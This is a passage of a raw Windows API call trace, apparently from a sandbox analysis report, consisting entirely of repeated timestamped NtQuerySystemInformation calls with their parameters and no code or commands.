SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca00, Length=0x20, ResultLength=0x0) [0288.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccc0, Length=0x38, ResultLength=0x0) [0288.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccc0, Length=0x38, ResultLength=0x0) [0288.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb40, Length=0x20, ResultLength=0x0) [0288.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cad0, Length=0x20, ResultLength=0x0) [0288.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cad0, Length=0x20, ResultLength=0x0) [0288.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cda0, Length=0x58, ResultLength=0x0) [0288.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccc0, Length=0x38, ResultLength=0x0) [0288.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207caf0, Length=0x28, ResultLength=0x0) [0288.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207caf0, Length=0x28, ResultLength=0x0) [0288.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207caf0, Length=0x28, ResultLength=0x0) [0288.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207caf0, Length=0x28, ResultLength=0x0) [0288.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb60, Length=0x28, ResultLength=0x0) [0288.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccc0, Length=0x38, ResultLength=0x0) [0288.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x28, ResultLength=0x0) [0288.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x28, ResultLength=0x0) [0288.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccc0, Length=0x38, ResultLength=0x0) [0288.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb40, Length=0x20, ResultLength=0x0) [0288.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cac0, Length=0x20, ResultLength=0x0) [0288.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cac0, Length=0x20, ResultLength=0x0) [0288.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cac0, Length=0x20, ResultLength=0x0) [0288.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccc0, Length=0x38, ResultLength=0x0) [0288.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb40, Length=0x20, ResultLength=0x0) [0288.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cad0, Length=0x20, ResultLength=0x0) [0288.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.185] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.185] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.185] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cad0, Length=0x20, ResultLength=0x0) [0288.185] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.185] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.185] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.185] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.185] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.185] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cda0, Length=0x58, ResultLength=0x0) [0288.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc80, Length=0x38, ResultLength=0x0) [0288.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cac0, Length=0x28, ResultLength=0x0) [0288.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cac0, Length=0x28, ResultLength=0x0) [0288.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cac0, Length=0x28, ResultLength=0x0) [0288.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cac0, Length=0x28, ResultLength=0x0) [0288.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb30, Length=0x28, ResultLength=0x0) [0288.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc80, Length=0x38, ResultLength=0x0) [0288.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc80, Length=0x38, ResultLength=0x0) [0288.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbb0, Length=0x28, ResultLength=0x0) [0288.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbb0, Length=0x28, ResultLength=0x0) [0288.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc80, Length=0x38, ResultLength=0x0) [0288.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc80, Length=0x38, ResultLength=0x0) [0288.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca20, Length=0x20, ResultLength=0x0) [0288.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9a0, Length=0x20, ResultLength=0x0) [0288.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9a0, Length=0x20, ResultLength=0x0) [0288.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9a0, Length=0x20, ResultLength=0x0) [0288.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbf0, Length=0x20, ResultLength=0x0) [0288.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc80, Length=0x38, ResultLength=0x0) [0288.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb10, Length=0x20, ResultLength=0x0) [0288.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca90, Length=0x20, ResultLength=0x0) [0288.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca90, Length=0x20, ResultLength=0x0) [0288.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca90, Length=0x20, ResultLength=0x0) [0288.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc80, Length=0x38, ResultLength=0x0) [0288.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb10, Length=0x20, ResultLength=0x0) [0288.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca90, Length=0x20, ResultLength=0x0) [0288.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca90, Length=0x20, ResultLength=0x0) [0288.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca90, Length=0x20, ResultLength=0x0) [0288.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc80, Length=0x38, ResultLength=0x0) [0288.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb10, Length=0x20, ResultLength=0x0) [0288.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207caa0, Length=0x20, ResultLength=0x0) [0288.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207caa0, Length=0x20, ResultLength=0x0) [0288.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d008, Length=0x50, ResultLength=0x0) [0288.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf30, Length=0x38, ResultLength=0x0) [0288.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd60, Length=0x28, ResultLength=0x0) [0288.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd60, Length=0x28, ResultLength=0x0) [0288.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd60, Length=0x28, ResultLength=0x0) [0288.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd60, Length=0x28, ResultLength=0x0) [0288.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdd0, Length=0x28, ResultLength=0x0) [0288.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf30, Length=0x38, ResultLength=0x0) [0288.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce50, Length=0x28, ResultLength=0x0) [0288.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce50, Length=0x28, ResultLength=0x0) [0288.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf30, Length=0x38, ResultLength=0x0) [0288.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdb0, Length=0x20, ResultLength=0x0) [0288.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd30, Length=0x20, ResultLength=0x0) [0288.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd30, Length=0x20, ResultLength=0x0) [0288.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd30, Length=0x20, ResultLength=0x0) [0288.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf30, Length=0x38, ResultLength=0x0) [0288.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdb0, Length=0x20, ResultLength=0x0) [0288.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd40, Length=0x20, ResultLength=0x0) [0288.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd40, Length=0x20, ResultLength=0x0) [0288.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.219] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.219] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ceb0, Length=0x50, ResultLength=0x0) [0288.219] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.220] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cde0, Length=0x38, ResultLength=0x0) [0288.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc10, Length=0x28, ResultLength=0x0) [0288.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc10, Length=0x28, ResultLength=0x0) [0288.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc10, Length=0x28, ResultLength=0x0) [0288.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc10, Length=0x28, ResultLength=0x0) [0288.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc80, Length=0x28, ResultLength=0x0) [0288.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cde0, Length=0x38, ResultLength=0x0) [0288.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd00, Length=0x28, ResultLength=0x0) [0288.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.234] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.234] 